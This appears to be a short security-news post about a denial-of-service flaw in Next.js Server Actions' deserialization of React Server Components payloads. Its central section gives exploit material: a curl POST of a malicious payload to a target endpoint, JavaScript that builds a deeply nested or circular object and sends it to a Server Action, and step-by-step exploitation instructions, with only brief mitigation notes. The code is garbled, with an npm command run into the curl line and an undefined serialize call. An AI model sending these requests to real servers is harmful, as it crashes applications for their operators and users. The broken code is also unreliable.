Listen to this Post
This vulnerability exists within the React Server Components (RSC) payload deserialization mechanism used by Next.js App Router Server Functions (Server Actions). The deserialization process, which handles data sent from client components to server functions, does not safely manage deeply nested or recursively referenced object structures. An attacker can craft a malicious HTTP request containing a serialized object with circular references or excessive nesting depth. When the Next.js server attempts to deserialize this payload, it triggers a process that recursively traverses the object graph without proper bounds checking. This leads to uncontrolled consumption of CPU cycles as the parser attempts to resolve the infinite references, and can rapidly allocate memory for each traversal step, resulting in an out-of-memory (OOM) exception. Consequently, a single malicious request can cause the Node.js process to become unresponsive or crash completely, leading to a Denial-of-Service (DoS) condition for the entire application.
Platform: Next.js
Version: 13.x – 16.x
Vulnerability: Deserialization DoS
Severity: High
date: Jan 26 2026
Prediction: Patch Feb 05 2026
What Undercode Say:
npm list next react react-dom curl -X POST "https://target.com/api/action" -H "Content-Type: text/plain" --data-binary @malicious_payload.bin
// Malicious payload structure
const malicious = {};
let temp = malicious;
for(let i=0; i<100000; i++) { temp.ref = {}; temp = temp.ref; }
// or circular: let a={}; let b={ref:a}; a.ref=b;
fetch('/server-action', { method: 'POST', body: serialize(malicious) })
How Exploit:
Craft recursive object.
POST to Server Action.
Trigger infinite deserialization loop.
Exhaust CPU/memory.
Protection from this CVE
Update to patched versions.
Implement request size limiting.
Use WAF rate-limiting.
Impact:
Application DoS.
Server resource exhaustion.
Unavailable services.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

